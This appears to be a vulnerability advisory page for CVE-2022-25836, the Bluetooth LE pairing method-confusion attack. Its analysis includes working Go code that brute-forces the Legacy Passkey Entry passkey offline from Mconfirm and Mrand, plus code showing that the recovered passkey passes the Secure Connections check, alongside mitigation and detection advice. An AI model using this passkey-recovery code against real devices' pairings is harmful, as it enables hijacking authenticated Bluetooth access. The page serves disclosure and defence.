CVE-2022-25836 in Bluetooth Core Specification

Summary

by MITRE • 12/12/2022

Bluetooth® Low Energy Pairing in Bluetooth Core Specification v4.0 through v5.3 may permit an unauthenticated MITM to acquire credentials with two pairing devices via adjacent access when the MITM negotiates Legacy Passkey Pairing with the pairing Initiator and Secure Connections Passkey Pairing with the pairing Responder and brute forces the Passkey entered by the user into the Initiator. The MITM attacker can use the identified Passkey value to complete authentication with the Responder via Bluetooth pairing method confusion.


Analysis

by VulDB Data Team • 06/18/2026

The vulnerability lies in the Bluetooth Low Energy (LE) pairing procedures defined in the Bluetooth Core Specification, versions 4.0 through 5.3. It is not a defect in any single pairing method but a method-confusion problem: an attacker within radio range interposes itself between two devices that are about to pair and runs a different procedure with each of them. Toward the pairing Initiator it negotiates LE Legacy Passkey Entry; toward the pairing Responder it negotiates LE Secure Connections Passkey Entry. Both procedures present the user with the same six-digit passkey dialog, so nothing in the user experience reveals that the two devices are not actually pairing with each other. The asymmetry matters because the two procedures protect the passkey very differently.

The exploitable step is the Legacy Passkey Entry run with the Initiator. In LE Legacy Pairing the six-digit passkey is the Temporary Key (TK) itself: the Initiator sends Mconfirm = c1(TK, Mrand, preq, pres, iat, rat, ia, ra) and, once a confirm value has come back, reveals Mrand in the clear. The attacker, posing as the Responder, answers Mconfirm with an arbitrary Sconfirm, waits for Mrand, and then tries all 1,000,000 candidate passkeys offline until one reproduces Mconfirm. That is two AES-128 operations per candidate, a few seconds of work at most on ordinary hardware. No implementation weakness is needed; the procedure as specified authenticates with a secret of under 20 bits and hands the attacker a value against which every guess can be checked. The pairing with the Initiator then fails at the Initiator's own confirm check, because the attacker cannot produce an Srand matching the Sconfirm it already sent, and the user is likely to read this as an ordinary pairing error. The recovered passkey is used toward the Responder, where Secure Connections Passkey Entry authenticates the peer bit by bit against exactly that value, so the attacker completes an authenticated pairing there. Apart from a Bluetooth LE device able to act as both Central and Peripheral within range of the victims, no special equipment is required.
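As an added worked example, not code from the page, the specification or any vendor stack, the following Go program implements the Legacy Pairing confirm function c1 from Core Specification Vol 3, Part H, Section 2.2.3, encodes the passkey as the TK, and runs the attacker's offline search over the one million candidates given Mconfirm and Mrand. The Pairing Request/Response PDUs, device addresses and passkey are constructed sample values, not a capture; the c1 byte layout can be checked against the sample data in that section of the specification.

```go
package main

import (
	"crypto/aes"
	"crypto/rand"
	"encoding/binary"
	"fmt"
)

// PairingCtx holds what a listener sees in the clear before any confirm value is sent.
type PairingCtx struct {
	Preq, Pres [7]byte // Pairing Request / Pairing Response PDUs, opcode first
	Iat, Rat   byte    // initiator / responder address type (0 public, 1 random)
	Ia, Ra     [6]byte // initiator / responder device address, MSB first
}

func xor16(a, b [16]byte) (o [16]byte) {
	for i := range a {
		o[i] = a[i] ^ b[i]
	}
	return
}

// c1 is the LE Legacy Pairing confirm value function (Core Spec Vol 3, Part H, 2.2.3):
// c1(k, r, ...) = e(k, e(k, r XOR p1) XOR p2) with e = AES-128,
// p1 = pres || preq || rat' || iat' and p2 = 0^32 || ia || ra (all MSB first).
func c1(k, r [16]byte, c PairingCtx) (out [16]byte) {
	var p1, p2 [16]byte
	copy(p1[0:7], c.Pres[:])
	copy(p1[7:14], c.Preq[:])
	p1[14], p1[15] = c.Rat&1, c.Iat&1
	copy(p2[4:10], c.Ia[:])
	copy(p2[10:16], c.Ra[:])
	blk, err := aes.NewCipher(k[:])
	if err != nil {
		panic(err)
	}
	in := xor16(r, p1)
	blk.Encrypt(out[:], in[:])
	in = xor16(out, p2)
	blk.Encrypt(out[:], in[:])
	return out
}

// tkFromPasskey is the Legacy Passkey Entry Temporary Key: the six-digit passkey as a
// 128-bit big-endian integer (2.3.5.3). Only 10^6 of the 2^128 possible keys ever occur.
func tkFromPasskey(pk uint32) (tk [16]byte) {
	binary.BigEndian.PutUint32(tk[12:], pk)
	return
}

// recoverPasskey is the MITM's offline search. Posing as Responder toward the real
// Initiator it has received Mconfirm, answered with an arbitrary Sconfirm and then been
// sent Mrand; since Mconfirm = c1(TK, Mrand, ...), every candidate TK can be checked.
func recoverPasskey(mconfirm, mrand [16]byte, c PairingCtx) int {
	for pk := uint32(0); pk < 1000000; pk++ {
		if c1(tkFromPasskey(pk), mrand, c) == mconfirm {
			return int(pk)
		}
	}
	return -1
}

// sampleCtx is a constructed exchange, not a capture. The Initiator asked for Secure
// Connections (AuthReq 0x0D: bonding, MITM, SC) but the MITM's Pairing Response clears the
// SC bit (AuthReq 0x05), so the Initiator falls back to Legacy Passkey Entry.
func sampleCtx() PairingCtx {
	return PairingCtx{
		Preq: [7]byte{0x01, 0x02, 0x00, 0x0D, 0x10, 0x07, 0x07}, // IO cap 0x02 KeyboardOnly
		Pres: [7]byte{0x02, 0x00, 0x00, 0x05, 0x10, 0x07, 0x07}, // IO cap 0x00 DisplayOnly
		Ia:   [6]byte{0xA1, 0xA2, 0xA3, 0xA4, 0xA5, 0xA6},
		Ra:   [6]byte{0xB1, 0xB2, 0xB3, 0xB4, 0xB5, 0xB6},
	}
}

// simulate plays the Initiator for a given passkey and returns what the MITM recovers.
func simulate(userPasskey uint32) int {
	ctx := sampleCtx()
	var mrand [16]byte
	if _, err := rand.Read(mrand[:]); err != nil {
		panic(err)
	}
	mconfirm := c1(tkFromPasskey(userPasskey), mrand, ctx) // Initiator -> MITM
	// MITM -> Initiator: any 16 bytes as Sconfirm; Initiator -> MITM: Mrand in the clear.
	return recoverPasskey(mconfirm, mrand, ctx)
}

func main() {
	fmt.Printf("MITM recovered passkey %06d\n", simulate(540211)) // 540211 is what the user typed
}
```

The search is embarrassingly parallel and needs nothing but Mconfirm, Mrand and the cleartext PDUs, which is why no rate limit on the device can slow it down; the only effective countermeasure is never to run Legacy Pairing at all.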

The impact is that the attacker, not the legitimate Initiator, ends up holding an authenticated pairing with the Responder, together with the Long Term Key if bonding was requested, and can reconnect later to reach anything the Responder restricts to authenticated peers. Whether that access extends further, for example to a network behind the device, depends on what the particular Responder exposes to a paired peer rather than on the vulnerability itself. Any LE device built against Core Specification 4.0 through 5.3 that offers Passkey Entry and still accepts LE Legacy Pairing is in scope, which includes smartphones, tablets, laptops and IoT devices. The attacker has to be in radio range at the moment the user starts a pairing, so the realistic setting is one where pairings are routine and performed in shared spaces such as offices and public venues.
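To show why the recovered passkey is all the attacker needs on the Secure Connections side, the following Go program, again an added example rather than code from the page or from any Bluetooth stack, implements AES-CMAC (RFC 4493), the commitment function f4 from Core Specification Vol 3, Part H, Section 2.2.6, and the per-bit commitment of Secure Connections Passkey Entry, then runs the Responder's twenty-round check against a peer that holds the right passkey and one that is off by a single bit. The public-key x-coordinates are random stand-ins; a real attacker would use its own P-256 key pair, and the key exchange itself is not modeled.

```go
package main

import (
	"crypto/aes"
	"crypto/rand"
	"fmt"
)

func xor16(a, b [16]byte) (o [16]byte) {
	for i := range a {
		o[i] = a[i] ^ b[i]
	}
	return
}

func mustRand(b []byte) {
	if _, err := rand.Read(b); err != nil {
		panic(err)
	}
}

// aesCMAC is RFC 4493 AES-CMAC, the primitive beneath the Secure Connections functions
// f4, f5 and f6 (Core Spec Vol 3, Part H, 2.2.5).
func aesCMAC(key [16]byte, msg []byte) [16]byte {
	blk, err := aes.NewCipher(key[:])
	if err != nil {
		panic(err)
	}
	enc := func(in [16]byte) (out [16]byte) {
		blk.Encrypt(out[:], in[:])
		return
	}
	dbl := func(b [16]byte) (o [16]byte) { // multiply by x in GF(2^128), RFC 4493 2.3
		var carry byte
		for i := 15; i >= 0; i-- {
			o[i], carry = b[i]<<1|carry, b[i]>>7
		}
		if b[0]&0x80 != 0 {
			o[15] ^= 0x87
		}
		return
	}
	k1 := dbl(enc([16]byte{}))
	k2 := dbl(k1)
	n := (len(msg) + 15) / 16
	if n == 0 {
		n = 1
	}
	var last [16]byte
	tail := msg[(n-1)*16:]
	copy(last[:], tail)
	if len(tail) == 16 {
		last = xor16(last, k1) // complete final block
	} else {
		last[len(tail)] = 0x80 // 10* padding, then k2
		last = xor16(last, k2)
	}
	var x [16]byte
	for i := 0; i < n-1; i++ {
		var b [16]byte
		copy(b[:], msg[i*16:])
		x = enc(xor16(x, b))
	}
	return enc(xor16(x, last))
}

// f4 is the SC commitment function (2.2.6): f4(U, V, X, Z) = AES-CMAC_X(U || V || Z),
// U and V being the 256-bit public-key x-coordinates, X a 128-bit nonce, Z one octet.
func f4(u, v [32]byte, x [16]byte, z byte) [16]byte {
	msg := append(append(append(make([]byte, 0, 65), u[:]...), v[:]...), z)
	return aesCMAC(x, msg)
}

// scPasskeyCommit is one round of SC Passkey Entry (2.3.5.6.3): the sender commits to bit i
// of the 20-bit passkey, r_i = 0x80 | bit_i, under a fresh nonce it reveals only afterwards.
func scPasskeyCommit(pkAx, pkBx [32]byte, nonce [16]byte, passkey uint32, round int) [16]byte {
	return f4(pkAx, pkBx, nonce, byte(0x80|((passkey>>uint(round))&1)))
}

// responderAccepts is the Responder's 20-round check against a peer holding peerPasskey.
// Each round verifies one passkey bit, so the peer passes iff its passkey equals the one the
// user entered; a wrong value fails at the first differing bit. This is why the MITM has to
// recover the passkey from the Legacy side before it can finish pairing here.
func responderAccepts(pkAx, pkBx [32]byte, peerPasskey, userPasskey uint32) bool {
	for i := 0; i < 20; i++ {
		var na [16]byte
		mustRand(na[:])
		ca := scPasskeyCommit(pkAx, pkBx, na, peerPasskey, i)      // peer sends Ca_i first
		if ca != scPasskeyCommit(pkAx, pkBx, na, userPasskey, i) { // Responder recomputes once Na_i arrives
			return false
		}
	}
	return true
}

func main() {
	var pkAx, pkBx [32]byte // stand-ins for the P-256 x-coordinates exchanged in the clear
	mustRand(pkAx[:])
	mustRand(pkBx[:])
	fmt.Println("peer with the recovered passkey accepted:", responderAccepts(pkAx, pkBx, 540211, 540211))
	fmt.Println("peer off by one bit accepted:            ", responderAccepts(pkAx, pkBx, 540210, 540211))
}
```

The commitment scheme is sound against an attacker who does not know the passkey, since each round exposes a single bit and a wrong guess is caught before the next bit is committed; it simply offers no protection once the passkey has leaked through the Legacy procedure on the other side of the MITM.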

Mitigation has to remove the downgrade rather than slow down the guessing: the passkey search runs offline against a value the attacker already holds, so rate limiting or lockout on the device changes nothing. The effective control is LE Secure Connections Only mode, which the Core Specification already defines and which makes a device reject any LE Legacy Pairing request, so the attacker can no longer run Legacy Passkey Entry with the Initiator. Passkeys must also be freshly generated for every pairing attempt, as the specification requires, so that a value recovered from one attempt is worthless for the next. Host stacks should log pairing attempts, the method actually negotiated and Pairing Failed reasons; a Legacy pairing negotiated by a device that supports Secure Connections, or a pairing abandoned after the random values were exchanged, is the trace this attack leaves on the Initiator. Users should treat an unexplained pairing failure followed by a retry prompt with suspicion rather than simply re-entering the passkey. In ATT&CK terms the attack is an Adversary-in-the-Middle (T1557) under the Credential Access and Collection tactics. The weakness is tracked as CWE-310 (cryptographic issues) and CWE-287 (improper authentication); closing it is a stack and configuration decision for device manufacturers, with end users dependent on firmware updates that enforce it.

The root cause is backward compatibility: the specification keeps LE Legacy Pairing alongside LE Secure Connections, and a device that accepts both lets its peer choose the method, which in a man-in-the-middle position means the attacker chooses. Enforcing Secure Connections Only mode closes the hole but breaks pairing with Legacy-only peers, a trade-off every deployment has to make explicitly rather than leave to the default. The case is a textbook example of a widely deployed protocol whose compatibility guarantees work against its security requirements. Organizations should enable Secure Connections Only mode wherever their device population allows it, update stacks that cannot yet enforce it, and teach users to decline pairing requests they did not initiate. Understanding and defending against the attack requires reasoning about the pairing state machine across both procedures and about the order in which confirm values and random values are exchanged, not about either pairing method in isolation.

Reservation

02/24/2022

Disclosure

12/12/2022

Moderation

accepted

CPE

ready

EPSS

0.00353

KEV

no

Activities

very low

Sources
